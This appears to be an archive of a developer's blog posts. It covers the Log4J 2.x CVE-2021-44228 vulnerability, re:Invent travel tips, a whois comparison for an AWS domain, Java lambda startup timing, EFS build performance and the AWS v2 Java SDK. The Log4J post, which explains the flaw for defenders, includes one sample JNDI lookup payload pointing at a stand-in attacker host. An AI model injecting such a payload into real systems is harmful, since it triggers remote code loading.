<p> A week ago, a lot of Java application developers learned that their applications harbored a severe vulnerability, courtesy of the Log4J 2.x logging framework. The vulnerability, <a href="https://www.cve.org/CVERecord?id=CVE-2021-44228" target="_blank">CVE-2021-44228</a>, allowed execution of arbitrary code on any system that logged unsanitized user input using the Log4J 2.x library. This prompted a lot of people to scramble to protect their systems, and a lot of people to take to Twitter with opinions of What It All Means.
<p> As the maintainer of an <a href="https://github.com/kdgregory/log4j-aws-appenders" target="_blank">open-source library that integrates with Log4J</a>, I spent my Saturday morning understanding the bug and updating my examples to use versions of the library that mitigated the problem. Fortunately, my library is not directly affected, as long as its consumers don't use unsanitized data to configure the logging framework.
<p> Having done that, and reading as much as I could on the issue (the <a href="https://www.lunasec.io/docs/blog/log4j-zero-day/" target="_blank">LunaSec</a> writeups are excellent), I've decided to voice my own thoughts on the matter. Some of which I haven't seen other people say, so they may be similarly interesting to you.
<p> First, I think that it's important to recognize that this vulnerability — like most things that end up in the news — is not the result of a single issue. Instead, it's a combination of features, some of which make perfect sense:
<ol>
<li> <strong> Log4J 2.x provides string interpolation for configuration (aka
“<a href="https://logging.apache.org/log4j/2.x/manual/lookups.html" target="_blank">lookups</a>”) </strong>
<p>
This is a great idea; I implemented it for my own logging library. The idea is that you don't want your configuration files to contain hardcoded values, such as the address of your central syslog daemon (or, in my case, the name of a CloudWatch log group). Log4J 2.x provides a long list of lookups, ranging from environment variables to information from the Docker container running your application.
<li> <strong> One of the lookups retrieves data from the Java Naming and Directory Interface (JNDI) API </strong>
<p>
In large deployments, it's nice to be able to centralize your configuration. There are lots of tools to do this, but Java Enterprise Edition settled on JNDI, also known as the <code>javax.naming</code> package. JNDI is an umbrella API for retrieving data from different sources, such as LDAP.
<li> <strong> <code><a href="https://docs.oracle.com/javase/8/docs/api/javax/naming/spi/ObjectFactory.html" target="_blank">javax.naming.spi.ObjectFactory</a></code> supports loading code from a remote server </strong>
<p>
This is a somewhat dubious idea, but the <a href="https://docs.oracle.com/javase/8/docs/technotes/guides/jndi/spec/spi/jndispi.fm.html#a1007760" target="_blank">JNDI SPI (service provider interface) spec</a> justifies it: it lets you define resources that can be retrieved directly from JNDI. The spec uses the example of a printer driver, which should be familiar to anyone who has installed a printer on their home computer (do you know that the driver you installed is trustworthy?).
<p>
Note: this condition is necessary for remote-code execution, but <em>not</em> for data exfiltration.
<li> <strong> The Log4J 2.x <code>PatternLayout</code> also supports string interpolation, with the same set of lookups </strong>
<p>
Here we're getting into questionable features in the library. I had no idea that this behavior existed, even though I dug deeply into the documentation and source code when implementing my appenders. The <a href="https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout" target="_blank">documentation</a> for this layout class is quite long, and prior to the vulnerability, you had to infer the behavior based on the presence of the <code>nolookups</code> pattern option.
<li> <strong> Users log unsanitized data </strong>
<p>
If users passed all of their logging messages through a sanitizer that looked for and removed the sequence <code>${</code>, then the vulnerability wouldn't exist. Except nobody does that, because why would you have to? I call it out because I think it's important to consider what you're logging, and whether it might contain information that you don't want to log. As I say in my “effective logging” talk, passwords can hide in the darndest places. (There's a short illustration of this item just after the list.)
</ol>
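<p> To make that last item concrete, here's a hypothetical example; the handler and variable are invented for illustration, and any logged value that an attacker controls will do:
<pre class="codeSample">
// the User-Agent header is entirely attacker-controlled
String userAgent = request.getHeader("User-Agent");

// if the attacker sent "${jndi:ldap://attacker.example.com/exploit}", a
// vulnerable Log4J 2.x applies the lookup while formatting the message
logger.info("request received, user-agent: {}", userAgent);
</pre>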
<p> These are the things that need to happen to make this vulnerability affect you. If you can prevent one of them from happening, you're not vulnerable … to this specific issue. And there <em>are</em> ways to do this, although they aren't things that you can easily implement once the vulnerability is discovered. I'm writing a separate post on how Cloud deployments can mitigate similar vulnerabilities.
<p> For now, however, I want to focus on two of the responses that I saw online: pay for open-source maintainers, and inspecting code before using it. In my opinion, neither of these are valid, and they distract from preparing for the <em>next</em> serious vulnerability.
<h2> Response #1: inspect code before you use it. </h2>
<p> For any non-trivial application, this is simply impossible.
<p> The current “trunk” revision of <code>log4j-core</code> has 89,778 lines of code, excluding test classes (measured using <code>find</code> and <code>wc</code>). That doesn't count any add-on libraries that you might use to write to your preferred destination, such as my <a href="https://github.com/kdgregory/log4j-aws-appenders" target="_blank">log4j-aws-appenders</a> (which has over 10,000 lines of mainline code). And logging is a tiny part of a modern application, which is typically built using a framework such as Spring, and runs on an application server such as Tomcat or Jetty.
<p> And even if your company is willing to pay for the staff to read all of that source code, what is the chance that they will discover a vulnerability? What is the chance that they will even learn all of its behaviors? I've spent quite a bit of time with the Log4J 2.x code and documentation, both to write my library and on <a href="https://www.kdgregory.com/index.php?page=logging.log4j2Plugins" target="_blank">a post describing how to write Log4J plugins</a>, and I never realized that it applied string interpolation to the raw log messages. After I knew about the vulnerability, of course, it was easy to find the code responsible.
<h2> Response #2: we — or at least large companies — should be paying the maintainers of open-source projects. </h2>
<p> I don't know the situation of the core Log4J developers, and whether or not they get paid for their work on the project.<a href="#footnote1">¹</a> But I don't believe that this vulnerability was the result of an overworked, unpaid, solo developer. True, there was no discussion on the <a href="https://issues.apache.org/jira/browse/LOG4J2-313" target="_blank">commit that introduced JNDI lookups</a> (ignoring the tacky post-hoc commenters). But the code that applies string substitution to logging events has been in the library since the 2.0 release, and has been rewritten multiple times since then.
<p> In fact, I think direct corporate sponsorship would lead to <em>more</em> unexpected behavior, because the sponsoring corporations will all have their own desires, and an expectation that those desires will be met. And if my experience in the corporate world is any guide, a developer that feels their paycheck is in jeopardy is much more likely to do something without giving it full thought.
<h2> So where does that leave us? </h2>
<p> Unfortunately, I haven't seen very many practical responses (although, as I said, I'm writing a separate post to this effect). And I think that the reason for that is that the real answer puts the onus for vulnerabilities on us, the consumers of open-source software.
<p> <a href="https://en.wikipedia.org/wiki/Linus%27s_law" target="_blank">Linus's Law</a>, coined by Eric S Raymond, is that “given enough eyeballs, all bugs are shallow.” And this played out in full view with this vulnerability: the Log4J team quickly found and patched the problem, and has been releasing additional patches since.<a href="footnote2">²</a> There have also been multiple third-parties that have written detailed evaluations of the vulnerability.<a href="footnote2">³</a>
<p> But still, we, the consumers of this package, needed to update our builds to use the latest version. And then deploy those updated builds. If you didn't already have a process that allows you to quickly build and deploy a hotfix, then your weekend was shot. Even if you did get a hotfix out, you needed to spend time evaluating your systems to ensure that they weren't compromised (and beware that the most likely compromise was exfiltration of secrets!).
<p> It's natural, in such circumstances, to feel resentment, and to look for external change to make such problems go away. Or maybe even to think about reducing your reliance on open-source projects. <p> But in my opinion, this is the wrong outcome. Instead, look at this event as a wake-up call to make your systems more robust. Be prepared to do a hotfix at a moment's notice. Utilize tools such as web application firewalls, which can be quickly updated to block malicious traffic. And improve your forensic logging, so that you can identify the effects of vulnerabilities after they appear (just don't log unsanitized input!).
<p> Because this is not the last vulnerability that you will see.
<hr/>
<p> <a name="footnote1">1</a>:
You might be interested to learn that the Apache Software Foundation receives approximately $3 million a year (annual reports <a href="https://www.apache.org/foundation/reports.html" target="_blank">here</a>). However, to the best of my knowledge, they do not pay stipends to core maintainers. I do not know how the core Log4J 2.x maintainers earn their living.
<p> <a name="footnote2">2</a>:
<a href="https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.0" target="_blank">Log4J 2.x change report</a>.
<p> <a name="footnote3">3</a>:
I particularly like the CloudFlare posts, especially the one that <a href="https://blog.cloudflare.com/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/" target="_blank">describes how attackers changed their payloads to avoid simple firewall rules</a>. This post informed my belief that the goal of most attacks was to exfiltrate secrets rather than take over systems.
<h1> My take on “How to re:Invent” (2021-07-14) </h1>
<p> It's back. AWS is taking over Las Vegas for a week filled with information, sales pitches, and corporate-friendly activities. And while COVID and the possibility of a “fourth wave” hang over the conference, I decided to sign up. Having been to re:Invent once, I now consider myself an expert on how to survive the week. Here are five of my suggestions.
<dl>
<dt> <b> #1: Wear comfortable shoes. </b>
<dd> OK, everybody says this, but it bears repeating: you're going to do a lot of walking. It might take ten minutes to navigate from the front door of a hotel to the meeting rooms, following a labyrinthine path through the casino. To give you some numbers: my watch recorded 87,000 steps, or 44.6 miles, over the five days of the conference. That may be higher than average: I often walked between venues rather than find my way to the shuttle buses. But even if you “only” walk 30 miles, you'll still be thankful for doing it in a pair of running shoes.
<dt> <b> #2: Stay in a “venue” hotel. </b>
<dd> These are the hotels that host sessions and other sponsored content, as opposed to the “sleeping” hotels that just have rooms for attendees. There are several reasons to stay at a venue hotel, but in my opinion the most important is that it cuts down on the amount of walking that you have to do. Of my 87,000 steps, I estimate that 10,000 or more were taken up in walking from my room at the Park MGM to the Aria so that I could pick up a shuttle bus.
<dt> <b> #3: Attend workshops, not sessions. </b>
<dd> There are some great sessions at re:Invent, conducted by people who are intimately familiar with the service. If you have specific questions it's worth attending one of the “deep dives” and then walking up to the speaker afterward to ask those questions.
<p> <em>But,</em> all of these sessions will be recorded, and you can watch them at your leisure. So if you don't have specific questions there's no reason to attend in-person. What you <em>can't</em> do after December 3rd is learn with an AWS instructor by your side (well, not for free anyway). Unfortunately, space for these workshops is limited, so sign up early for the ones you want (that said, scheduling at re:Invent is <em>extremely</em> fluid; at least half the sessions I attended were marked as full but then had spots open up an hour before they started).
<dt> <b> #4: Fly out on Saturday. </b>
<dd> If you're not from the United States, you may not realize that re:Invent takes place during the week after the Thanksgiving holiday. Thanksgiving is a time when people return home to visit family and friends, and then all of them get on a plane the following Sunday to return home. It's historically the busiest travel day of the year, and US airports are crowded and frantic with people who only fly on that weekend. Plus, airlines charge the highest rates of the year, because they know people will pay. Even if you have TSA/Pre, it's not fun.
<p> If you're willing to fly out a day early, you avoid the crowds. Plus, you can save significantly on the airfare (right now, it would save me over $300, or nearly 50%). Against that, you'll be paying for an extra night in Vegas. For me, with the conference rate for the hotel, the numbers worked.
<dt> <b> #5: Get out of Vegas. </b>
<dd> For some people, Vegas is a destination: they love the lights, the noise, and the constant activity. For me, it's overwhelming. Fortunately, you can find thousands of square miles of absolute desolation just outside city limits.
<p> Last time, I rented a motorcycle for a day and explored nearby attractions: <a href="http://parks.nv.gov/parks/valley-of-fire" target="_blank">Valley of Fire</a>, <a href="https://www.usbr.gov/lc/hooverdam/" target="_blank">Hoover Dam</a>, and <a href="https://www.blm.gov/programs/national-conservation-lands/nevada/red-rock-canyon" target="_blank">Red Rock Canyon</a>. This year, I'm planning to take three days and explore southern Utah and northern Arizona. If you're not a motorcyclist, Vegas also has plenty of rental cars, including exotics. And at the far end of the scale, you can spend a day in a high-performance driving class at the Las Vegas Motor Speedway.
</dl>
<p> Well, that's it. Now it's time to cross my fingers and hope the US COVID situation remains under control.
<h1> An open letter to the AWS Training organization (2021-06-08) </h1>
<p> You don't have a Feedback link on your site, but it seems that Amazon keeps close tabs on the Blogosphere, so hopefully this reaches you.
<p> I don't know whether you're an actual sub-division of Amazon, but the website URL https://www.aws.training certainly didn't give me a warm fuzzy feeling when it came up in Google. In fact, my first thought was that it was some unaffiliated company that had better SEO.
<p> So, since it was asking me for login credentials, I did what any reasonably cautious technologist would do, and ran <code>whois</code>. And this is what I got back:
<pre class="codeSample">
Domain Name: aws.training
Registry Domain ID: 8d519b3def254d2f980a08f62416a5b9-DONUTS
Registrar WHOIS Server: whois.comlaude.com
Registrar URL: http://www.comlaude.com
Updated Date: 2019-05-19T19:54:24Z
Creation Date: 2014-03-19T00:32:11Z
Registry Expiry Date: 2024-03-19T00:32:11Z
Registrar: Nom-iq Ltd. dba COM LAUDE
Registrar IANA ID: 470
Registrar Abuse Contact Email: abuse@comlaude.com
Registrar Abuse Contact Phone: +44.2074218250
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Amazon Technologies, Inc.
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: NV
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
</pre>
<p> That's the sort of whois entry that you get for an individual using a shared hosting service. In fact, it provides less information than you'll see with my domain, which runs on a shared hosting service, and I pay extra for privacy.
<p> By comparison, the whois entry for Amazon itself looks like this (and note that it's a different registrar, another red flag):
<pre class="codeSample">
Domain Name: amazon.com
Registry Domain ID: 281209_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2019-08-26T12:19:56-0700
Creation Date: 1994-10-31T21:00:00-0800
Registrar Registration Expiration Date: 2024-10-30T00:00:00-0700
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2083895770
Registrant Name: Hostmaster, Amazon Legal Dept.
Registrant Organization: Amazon Technologies, Inc.
Registrant Street: P.O. Box 8102
Registrant City: Reno
Registrant State/Province: NV
Registrant Postal Code: 89507
Registrant Country: US
Registrant Phone: +1.2062664064
Registrant Phone Ext:
Registrant Fax: +1.2062667010
Registrant Fax Ext:
Registrant Email: hostmaster@amazon.com
</pre>
<p> While I'm a little surprised by the Reno address, rather than Seattle, this at least looks like the sort of registration information used by a business rather than somebody who pays $10/month for hosting.
<p> I ended up getting to the training site via a link on the AWS Console, so I was able to achieve my goal.
<p> But I think there's a general lesson: don't forsake your brand without good reason.
<p> And at the very least, ask your network administrators to update your whois data.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-64024262089732627432021-02-26T08:00:00.000-05:002021-02-26T08:00:40.573-05:00Java8 Lambda Startup Times<p> A few months ago <a href="https://blog.kdgregory.com/2020/12/diving-into-first-run-times-for-lambdas.html" target="_blank">I wrote a post</a> about startup times of AWS Lambdas written in Java. This post has a similar title, but a different topic: it looks at the first-run time for lambdas (lowercase) in a Java program, and has nothing to do with AWS. Although I did discover this issue while writing code for AWS. Confused yet?
<p> <a href="https://docs.oracle.com/javase/tutorial/java/javaOO/lambdaexpressions.html" target="_blank">Lambda expressions</a> were added to the Java language with the release of Java 8 in 2014. By now I'm assuming every Java programmer has used them, if only as arguments to higher-order functions in the <code>java.util.stream</code> package:
<pre class="codeSample">
List<String> uppercasedNames = names.stream()
.map(s -> s.toUpperCase())
.collect(Collectors.toList());
</pre>
<p> You can implement your own higher-order functions, with parameter types from the <code>java.util.function</code> package (or, if you have more complex needs, by defining your own <a href="https://docs.oracle.com/javase/specs/jls/se8/html/jls-9.html#jls-9.8" target="_blank">functional interfaces</a>). So, for example, you might have a function with this signature:
<pre class="codeSample">
public static String retryLambda(long interval, long timeout, Supplier<String> lambda) throws Exception
</pre>
<p> This can be called with any lambda expression that doesn't take arguments and returns a string. For example:
<pre class="codeSample">
retryLambda(50, 100, () -> Instant.now().toString());
</pre>
<p> As you might have guessed from the signature, this function retries some operation. But before I dig into the implementation, here's some background about why you'd implement such a function. Most of my recent posts have referenced my <a href="https://github.com/kdgregory/log4j-aws-appenders" target="_blank">AWS logging library</a>, and this one's no different. When working with AWS, you need to be prepared to retry operations: either because AWS throttled the request (returning an error that indicates you should retry after a short delay), or because operations are eventually-consistent (there's a delay between creating something and being able to use it). As a result, AWS code can include a lot of retry loops:<a href="#footnote1">*</a>
<pre class="codeSample">
long timeoutAt = System.currentTimeMillis() + timeout;
while (System.currentTimeMillis() < timeoutAt)
{
String value = doSomething();
if (value != null)
return value;
Thread.sleep(interval);
}
throw new RuntimeException("timeout expired");
</pre>
<p> That's seven lines of boilerplate wrapping one line that actually does something. Functional programming is all about getting rid of boilerplate, so I implemented a function that would accept a lambda:<a href="#footnote2">**</a>
<pre class="codeSample">
public static String retryLambda(long interval, long timeout, Supplier<String> lambda) throws Exception
{
long timeoutAt = System.currentTimeMillis() + timeout;
while (System.currentTimeMillis() < timeoutAt)
{
String value = lambda.get();
if (value != null)
return value;
Thread.sleep(interval);
}
throw new RuntimeException("timeout expired");
}
</pre>
<p> The hardcoded loops can now be replaced with a call to this function:
<pre class="codeSample">
retryLambda(50, 250, () -> doSomething());
</pre>
<p> All well and good, and it reduced the size of the code, but then my tests started failing.
<p> When you're actually talking to AWS, you might need a timeout of 30 seconds or more. But you definitely don't want such a long timeout in a unit test. To solve that problem, I replaced the <code>interval</code> and <code>timeout</code> arguments with much shorter values: 50 and 200 milliseconds. My tests then asserted the number of times the function was called: based on those values, the operation should be attempted four times before timing out. However, I was seeing only two or three executions.
<p> When I dug into the problem, what I discovered is that the first execution of a lambda takes 40 to 50 <em>milliseconds</em> on my Core i7-3770K running Oracle Java 1.8.0_271. I knew there was a lot happening behind the scenes to make lambdas work, but wow, that's nearly infinity!
<p> I also ran on an EC2 <code>m5a.xlarge</code> instance running AWS Linux 2, and saw that it took over 70 milliseconds with OpenJDK 1.8.0_272, but only 18 milliseconds running Corretto 11.0.10.9.1. I have to assume that the performance improvement is similar across Java11 implementations, but haven't tested. If you'd like to try it out yourself, I've created <a href="https://gist.github.com/kdgregory/7d75e4aa6696caa7eaea2b0b77643542" target="_blank">a GitHub Gist</a> with the test program.
<p> One thing that I do <em>not</em> want you to take from this post is the idea that Java lambdas are bad, or are poorly implemented. I didn't delve too deeply into what happens during that first invocation, but suspect that the JVM is loading something from disk (much like the initial JVM startup time). And in my experiments, invoking additional, different lambdas did not add to the execution time. So, like anything Java, lambdas are best used in a long-running program.
<p> However, if you are in a similar situation, testing timing-dependent code that uses lambdas, you need to be prepared. When I ran into the problem, I simply wanted to move on with my life, so I relaxed the assertions (the primary assertion was elapsed time, which didn't change; only the number of invocations did). Now, after thinking about the problem and writing the example program for this post, I think I'd use a <code>@BeforeClass</code> function to “warm up” the lambda mechanism.
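<p> If you want to try that approach yourself, here's a minimal sketch, assuming JUnit 4 (for <code>@BeforeClass</code>) and the <code>retryLambda()</code> function shown above:
<pre class="codeSample">
import org.junit.BeforeClass;

@BeforeClass
public static void warmUpLambdaMechanism() throws Exception
{
    // the first lambda invoked in a JVM pays the bootstrap cost, so pay it
    // here rather than in a timed test; the supplier returns non-null, so
    // retryLambda() returns on its first attempt
    retryLambda(50, 100, () -> "warmup");
}
</pre>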
<hr/>
<p> <a name="footnote1">*</a>
Not all AWS code needs to have retry loops. But, for example, if you create a Kinesis stream you will need to wait until it becomes active before writing to it. I've seen some mock implementations of AWS services that don't accurately reflect these delays, leading to code that fails in the real world.
<p> <a name="footnote2">*</a>
Actually, I implemented <a href="https://github.com/kdgregory/log4j-aws-appenders/blob/trunk/library/logwriters/src/main/java/com/kdgregory/logging/common/util/RetryManager.java" target="_blank">a class</a>, which was far easier to replace during testing. For an example if its use, <a href="https://github.com/kdgregory/log4j-aws-appenders/blob/trunk/library/logwriters/src/main/java/com/kdgregory/logging/aws/cloudwatch/CloudWatchLogWriter.java#L202" target="_blank">look here</a>.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-32377406781770573902021-02-16T07:35:00.003-05:002021-02-17T07:54:44.954-05:00EFS Build Performance Revisited<p> A few years ago I <a href="https://blog.kdgregory.com/2018/08/poor-efs-performance-for-software-builds.html" target="_blank">wrote a post</a> calling out the poor performance of Amazon's Elastic File System (EFS) when used as the working directory for a software build. Since then, EFS has seen <a href="https://docs.aws.amazon.com/efs/latest/ug/document-history.html" target="_blank">many performance improvements</a>. Is it now viable for purposes such as developer home directories or build machines?
<p> <strong>TL;DR: no.</strong>
<p> As before, I'm using an <code>m5d.xlarge</code> EC2 instance running AWS Linux 2 as my testbed (for the record, <code>ami-03c5cc3d1425c6d34</code> — you'll see later why I want to remember this). It provides four virtual CPUs and 16GB of RAM, so hardware should not be an issue. My test builds are the AWS SDK and my logging appenders project (releasing the latter is why I spun up the instance in the first place). The appenders project is larger than it was last time, but is still a reasonable “small” project. For consistency, I'm using the same tag (<code>1.11.394</code>) for the AWS SDK; it's grown dramatically in the interim.
<p> I've configured the build machine with three users, each of which has their home directory in one of the tested storage types (instance store, EBS, EFS). The EBS test uses a 100 GB <code>gp2</code> volume that is dedicated to the build user. For the EFS test I created two volumes, to compare the different EFS <a href="https://docs.aws.amazon.com/efs/latest/ug/performance.html#performancemodes" target="_blank">performance modes</a>.
<p> For each build I took the following steps:
<ol>
<li> Copy the project from a "reference" user. This user has project directories without the <code>.git</code> directory, along with a fully-populated Maven local repository.
<li> Perform a test build. This is intended to ensure that all dependencies have been downloaded, and that there is nothing that would cause the build to fail.
<li> Run <code>mvn clean</code> in the test directory.
<li> Flush the disk cache (<code>sync</code>).
<li> For instance store, run TRIM (<code>fstrim -v /</code>) to avoid the penalty of SSD write amplification.
<li> Clear the in-memory buffer cache (<code>echo 3 > /proc/sys/vm/drop_caches</code>)
<li> Run the timed build (<code>time mvn compile</code>).
</ol>
<p> And here are the results. As before, I show the output from the <code>time</code> command: the first number is the "real" time (the wall-clock time it took to build). The second is "user" (CPU) time, while the third is "system" (kernel operation) time. All times are minutes:seconds, and are rounded to the nearest second.
<table>
<tr> <th> </th>
<th colspan="3"> Appenders </th>
<th colspan="3"> AWS SDK </th>
</tr>
<tr> <th> </th>
<th> Real </th>
<th> User </th>
<th> System </th>
<th> Real </th>
<th> User </th>
<th> System </th>
</tr>
<tr> <th align="left" style="padding-right: 1em;"> Instance Store </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:05 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:13 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:00 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 01:14 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 02:16 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:06 </td>
</tr>
<tr> <th align="left" style="padding-right: 1em;"> EBS </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:06 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:15 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:00 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 01:26 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 02:13 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:06 </td>
</tr>
<tr> <th align="left" style="padding-right: 1em;"> EFS General Purpose </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:23 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:20 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:01 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 15:29 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 02:22 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:15 </td>
</tr>
<tr> <th align="left" style="padding-right: 1em;"> EFS Max IO </th>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:55 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:18 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:01 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 36:24 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 02:28 </td>
<td align="right" style="padding-left: 1em; padding-right: 1em;"> 00:15 </td>
</tr>
</table>
<p> Comparing these timings to my previous run, the first thing that jumped out at me was how wildly different the reported “user” times are. In fact, they are so different that my first step was to fire up an EC2 instance using the same AMI as the previous test (thankfully, AWS doesn't delete <em>anything</em>), and confirm the numbers (and yes, they were consistent). Intuitively, it should take the same amount of CPU time to compile a project, regardless of the performance of the disk storage, so I'm not sure why I didn't do more digging when I saw the original numbers. Regardless, “real” time tells the story.
<p> And that story is that EFS still takes significantly longer than other options.
<p> There have been definite performance improvements: the “general purpose” EFS volume takes 15 minutes, versus the 30+ required by the earlier test (the close correspondence between the earlier test and the “Max IO” volume type makes me think that it might be the same implementation).
<p> But if you're speccing a build machine — or anything else that needs to work with large numbers of relatively small files — EFS remains a poor choice.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-11803145386891675042021-02-01T07:56:00.006-05:002024-01-24T09:12:55.046-05:00Why I Won't Use The AWS V2 Java SDK<p> <b> Update, 2024-01-24 </b>
<p> Well, I was wrong: <a href="https://aws.amazon.com/blogs/developer/announcing-end-of-support-for-aws-sdk-for-java-v1-x-on-december-31-2025/"
target="_blank">AWS is end-of-lifing the v1 SDK</a>. They will stop adding new features in July
of this year, and stop providing updates in December 2025. They just announced this plan, so
I'm still waiting to see if they'll back-pedal under pressure from large customers. But until
that happens, ignore my advice below and start converting your code.
<p> That said, feel free to read my venting from three years ago ...
<p> Amazon's "version 2" SDK for Java was first released three and a half years ago. As of this
writing, the current version is 2.15.73. So it's time to upgrade your Java AWS projects, right?
<p> To which my answer is a resounding “NO!” In fact, if you are starting a <em>new</em>
Java AWS project, I recommend that you stick with the version 1 SDK unless you have a
<em>compelling</em> reason to change. Especially if you already have code that uses version 1.
<p> I base these statements on my experience updating my <a href="https://github.com/kdgregory/log4j-aws-appenders" target="_blank">logging library</a>.
While this library doesn't use a lot of AWS services, it goes deep on the ones that it does
use, especially client configuration. For additional context, I've been using the version 1
Java SDK since it came out, I currently use the Python SDK very heavily, and I've also spent
some time with the JavaScript and Ruby SDKs. Plus, I implemented
<a href="https://sourceforge.net/projects/s34j/" target="_blank">my own S3 SDK</a>
before the Java SDK was available. In other words, I'm not just someone who spent an hour
trying to work with the library, got fed up, and is now venting.
<p> And before I do start venting, I want to call out the things that I <em>do</em> like about
the new library:
<dl>
<dt> <b> Consistent Naming </b>
<dd> This is big. It's not just a matter of getting rid of the superfluous “Amazon”
or ”AWS” prefix, but of consistent categorization. For example, CloudWatch
Logs: that's its name, you find its documentation next to other things named CloudWatch,
and you look at your logs by going to the CloudWatch page in the console. Yet in the v1
SDK it's called <code>AWSLogs</code>, and the JAR is <code>aws-java-sdk-logs</code>. A
small thing, but small things are what enhance or detract from developer productivity.
<dt> <b> Paginators </b>
<dd> Paginated requests are a Good Thing: not only do they reduce the load on Amazon's
servers, they avoid blowing up client programs (eg, downloading a gigabyte of data
due to a poorly configured <code>FilterLogEvents</code> call). But dealing with pagination
is a developer tax: the same dozen or so lines of code every time you make a paginated
request (in fact, that was one of the primary drivers of my been-on-hold-because-I-mostly-work-with-Python-these-days
<a href="https://github.com/kdgregory/aws-java-utils" target="_blank">AWS utility library</a>).
It's a lot easier to request a paginator and then loop through results or process them
with a Java8 stream. I especially like that Java paginators don't force you to deal with
<em>pages</em> at all, unlike the Python paginators.
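<p>
For example, a minimal sketch using the v2 CloudWatch Logs client:
<pre class="codeSample">
import software.amazon.awssdk.services.cloudwatchlogs.CloudWatchLogsClient;

CloudWatchLogsClient client = CloudWatchLogsClient.create();

// the paginator issues additional DescribeLogGroups calls as needed;
// logGroups() flattens the pages into a single iterable
client.describeLogGroupsPaginator()
      .logGroups()
      .forEach(group -> System.out.println(group.logGroupName()));
</pre>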
</dl>
<p> And … that's about it. Now onto the things that I <em>don't</em> like:
<dl>
<dt> <b> Wholesale name changes of getters and setters </b>
<dd> I understand why they did it: everybody hates Java's “bean” naming
conventions. The <code>get</code>, <code>set</code>, and <code>with</code> prefixes
are just visual clutter. All of the other SDKs use “property” naming,
so why not make the Java SDK consistent? But the result, if you're planning to upgrade
an existing project, means hours — perhaps days — of tedious manual
effort to get rid of those prefixes. And at the same time, you'll be converting
all of your code to use builders rather than constructors.
<dt> <b> Just when you get used to the new conventions, you find a client that doesn't follow them </b>
<dd> In my case, it was discovering that <code>KinesisClient</code> didn't support
paginators, so I found myself re-implementing that dozen lines of code to iterate
the list of streams. I also discovered that <code>IamClient</code> doesn't provide
<code>create()</code>, unlike the other clients, but that brings up a bigger issue.
<dt> <b> The documentation is incomplete and at times misleading </b>
<dd> <code>IamClient</code> doesn't implement the <code>create()</code> method. That
seems like an oversight, until you use <code>IamClient.builder().build()</code>
and get an <code>UnknownHostException</code> with a long and confusing chain of
causes. To get a usable client, you must add <code>.region(Region.AWS_GLOBAL)</code>
to the builder invocation.
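<p>
In other words, this is the invocation that actually works:
<pre class="codeSample">
import software.amazon.awssdk.regions.Region;
import software.amazon.awssdk.services.iam.IamClient;

IamClient client = IamClient.builder()
                            .region(Region.AWS_GLOBAL)
                            .build();
</pre>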
<p>
There is no hint of this in the <code>IamClient</code> documentation. The only
AWS documentation that has anything to say on the topic is the
<a href="https://docs.aws.amazon.com/sdk-for-java/latest/migration-guide/client-region.html" target="_blank">Migration Guide</a>,
in which you'll see “Some AWS services don't have Region specific endpoints.”
But no list of the classes affected, or examples of client configuration code. Oh,
and sorry to anybody in China who might want to use my library: you've got a
different region name.
<p>
That covers “incomplete.” For “misleading,” take a look at
<code>StsAssumeRoleCredentialsProvider</code>. The version 1 variant of this class
requires an STS client, which it uses to periodically refresh the credentials. For
<a href="https://sdk.amazonaws.com/java/api/latest/software/amazon/awssdk/services/sts/auth/StsAssumeRoleCredentialsProvider.Builder.html" target="_blank">version 2</a>,
there's no indication that this method exists — moreover, the JavaDoc claims
that the builder class extends <code>Object</code>, which should mean that the documented
methods are all that exist. You have to look at
<a href="https://github.com/aws/aws-sdk-java-v2/blob/master/services/sts/src/main/java/software/amazon/awssdk/services/sts/auth/StsAssumeRoleCredentialsProvider.java#L82" target="_blank">the source code</a>
to see that it actually extends a <code>BaseBuilder</code> class (and has since the
developer preview was released).
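<p>
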